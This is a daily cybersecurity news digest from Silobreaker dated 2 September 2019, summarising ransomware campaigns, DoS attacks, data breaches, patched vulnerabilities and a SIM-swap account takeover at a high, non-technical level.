Silobreaker Daily Cyber Digest – 02 September 2019
New tactics observed in WordPress malvertising campaign
- New features include the addition of a script that attempts to install a backdoor into the site, as well as the targeting of additional vulnerable plugins. Currently targeted plugins include Bold Page Builder, Blog Designer, and all former NicDark plugins.
- The researchers previously observed a number of IP addresses linked to the web hosting providers of the campaign, however only one remains active.
Source (Includes IOCs)
Finnish public service websites targeted in DoS attack
- A number of Finnish public service websites were targeted in a denial-of-service (DoS) attack that took place on August 21st, 2019. Targeted websites included those of the Finnish police force Poliisi, the central tax administration offices Vero, the Population Register Centre, the government’s online portal, the social insurance institution Kela, and the Finnish Border Guard’s website.
- The Finnish National Bureau of Investigations and the country’s National Cyber Security Centre are investigating the attacks, including a possible link between the attack and Russia’s President Putin’s recent visit to the country, which coincided with the attack.
Rise in defacement of Malaysian websites before Merdeka Day
- In an alert issued by the Malaysian Computer Emergency Response Team (MyCERT), the agency reported an increase in website defacements observed in the run up to the country’s independence day, Hari Merdeka, having observed a spike since August 28th, 2019.
- A similar notice was released by Malaysia’s National Cyber Security Agency, who also noted a number of Distributed Denial-of-Service attacks and malware infections targeting Malaysian organisations.
Ransomware attacks target 10 school systems across the US
- Researchers at Armor identified a spate of ransomware attacks directed against 10 school systems in Connecticut, New York State, California, Idaho, New Jersey and Washington State. Three of the schools have revealed that Ryuk Ransomware was used to encrypt their systems.
- Ransomware attacks were also recorded against Lake County, the Watertown Daily Times, and the Hospice of San Joaquin.
Sextortion scammers claim to be members of ChaosCC hacker group
- Bleeping Computer reported a sextortion email that purports to be sent by the hacker group Chaos Computer Club. The email states that the recipient’s computer is infected with a Trojan that recorded them on adult websites.
- The scammers, who have no access to the users device, claim that they will distribute a video recording of their target unless they are paid $700 in Bitcoin. Bleeping Computer reported that the wallet associated with the email contains approximately $2000 in BTC.
Recently disclosed iPhone campaign targeted Uyghur Muslims
- According to TechCrunch, Uyghur Muslims were targeted by recent iPhone watering hole attacks hidden in websites. The attacks, discovered by Google Project Zero, are said to have been state-backed, most likely by China.
- According to Forbes, the websites targeting Uyghur Muslims not only targeted iOS, but also Android and Microsoft Windows operating systems, suggesting the campaign is much broader than initially reported by Project Zero. It remains unclear which exploits were used for those operating systems.
Criminals advertise profitability of Sodinokibi on underground networks
- Security researcher Damian provided Bleeping Computer with screenshots that showed Sodinokibi malware advertisements on underground forums. In July 2019, a user operating under the alias ‘UNKN’ stated that they were looking to expand their activity and that a small number of seats were available for experienced individuals.
- The post stated that it was forbidden to operate Sodinokibi in the Commonwealth of Independent States (CIS) and refused to work with English-speaking affiliates. Screenshots also showed victims paying Bitcoin ransoms for as much as $240,000.
- Bleeping Computer tentatively suggested that there could be ties between Sodinokibi and GandCrab malware operators and affiliates. The report pointed to code level similarities, the refusal to carry out business in the CIS area, and more. Despite these links, Bleeping Computer concluded that ‘there is no clear, undeniable evidence’ that both ransomware are run by the same individuals.
United Rentals attributes malicious emails to third party advertising partner
- Customers of equipment rental company United Rentals received invoicing emails with links that led to malware believed to be a banking trojan. The campaign is notable as the emails sent users to a page on United Rentals’ website.
- United Rentals informed customers that the cause of the breach was an unauthorized user gaining access to the platform used by a third-party advertiser to conduct email campaigns.
- KrebsOnSecurity identified that the advertiser was Pardot, an email marketing division of Salesforce. Salesforce stated that the compromise was not in the Pardot Platform but of a third party marketing agency who use Pardot.
XMR crypto mining campaign targets Intel machines running Linux
- Security researcher Larry Cashdollar identified coin mining malware on Intel Systems running Linux. The malware is configured to target Intel x86 and 686 processors. The bug had previously only been discovered on Arm-powered IoT devices and appears to be a variant of other IoT crypto mining botnets.
- The malware looks to establish a SSH Port 22 connection and deliver itself as a gzip archive. The virus then creates three different directories which contain a variation of XMrig miner in x86 32 bit or 64 bit format.
- The bug then installs the cryptocurrency miner itself and looks to achieve persistence by modifying the infected system’s crontab file. A shell script is also installed which allows communication with the attacker’s C2.
Source (Includes IOCs)
Leaks and Breaches
Personal data of 1,400 Navicent Health patients potentially exposed
- The sensitive data may have been accessed by hackers following a phishing attack on an email account containing information on patients and individuals responsible for paying a patient’s bill. The phishing email was most likely opened between June 22nd and June 24th, 2019.
- Potentially exposed data includes first and last names, addresses, phone numbers, dates of birth, Social Security numbers, financial information, as well as medical information. The medical centre’s electronic medical record system was not accessed.
212,000 customer call recordings exposed in Teletext Holidays data breach
- Verdict researchers discovered an unsecured Amazon Web Services server belonging to Truly Travels Ltd, trading as Teletext Holidays, which contained 532,000 files and exposed private customer data. The files have since been removed.
- Of these files, 212,000 were audio recordings between Teletext customers and its India-based call centre that took place between April 10th and August 10th, 2016. The conversations included customer details such as flight times, locations, costs, partial card details, names, and dates of birth.
Taiwanese hospitals targeted in ransomware attacks
- According to the Taiwan Ministry of Health and Welfare, 56 hospitals were targeted by ransomware attacks that started on August 29th, 2019. A number of hospitals restored their systems within two hours and it is not believed any medical records were leaked. It is unclear where the attack originated.
Foxit data breach exposes the details of customers
- On August 30th, 2019, PDF software provider Foxit Software revealed that a third party gained unauthorized access to Foxit’s ‘My Account’ user data. Exposed details included email addresses, passwords, phone numbers, company names, and more. Foxit stated that financial information was not affected.
The Thailand Computer Security Coordination Center alerts gamblers of data leak
- The Thailand Computer Security Coordination Center (ThaiCERT) informed online gamblers that their confidential data had been leaked from gambling websites based overseas.
- ThaiCERT found the leak of 41 million items, 3.3 million of which belonged to Thais. Leaked information included names, government identification numbers, banking details, and more.
Critical vulnerability fixed in popular MuleSoft products
- Middleware company MuleSoft patched a directory traversal vulnerability in version 3 and 4 of its Mule runtime engines and its API Gateway. The flaw could allow an attacker to upload and plant files on a system in unexpected system locations, including locations where a malicious file could be executed automatically.
- MuleSoft privately informed its customers and provided a patch on July 31st, 2019, before publicly disclosing the vulnerability.
Trend Micro report investigates Jenkins plugin vulnerabilities
- Trend Micro examined the plugin vulnerabilities related to issues with plain-text-stored credentials. Vulnerabilities such as CVE-2019-10348 in Gogs, CVE-2019-10350 in Port Allocator, and CVE-2019-10351 in Caliper CL, can be exploited to gain access to sensitive user credentials.
- Impacted vulnerabilities and products, as well as a full technical analysis of associated issues, are available via Trend Micro.
DDoS attack targets online forum used by Hong Kong protestors
- On August 31st, 2019, a DDoS attack was launched against LIHKG. The forum has been used by citizens of Hong Kong to organize mass rallies. The DDoS attack lasted a few hours before service was restored.
Twitter CEO Jack Dorsey’s account hacked in SIM swap attack
- On August 30th, 2019, Jack Dorsey’s account was compromised and tweeted a series of offensive statements for a period of approximately 15 minutes. A group known as the Chuckling Squad claimed responsibility for the attack.
- Twitter stated that the account was compromised due to a security issue with an unnamed mobile operator. The BBC reported that a source at Twitter confirmed that the account was accessed through a SIM swapping attack. The attackers posted tweets via the Twitter’s text message feature.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.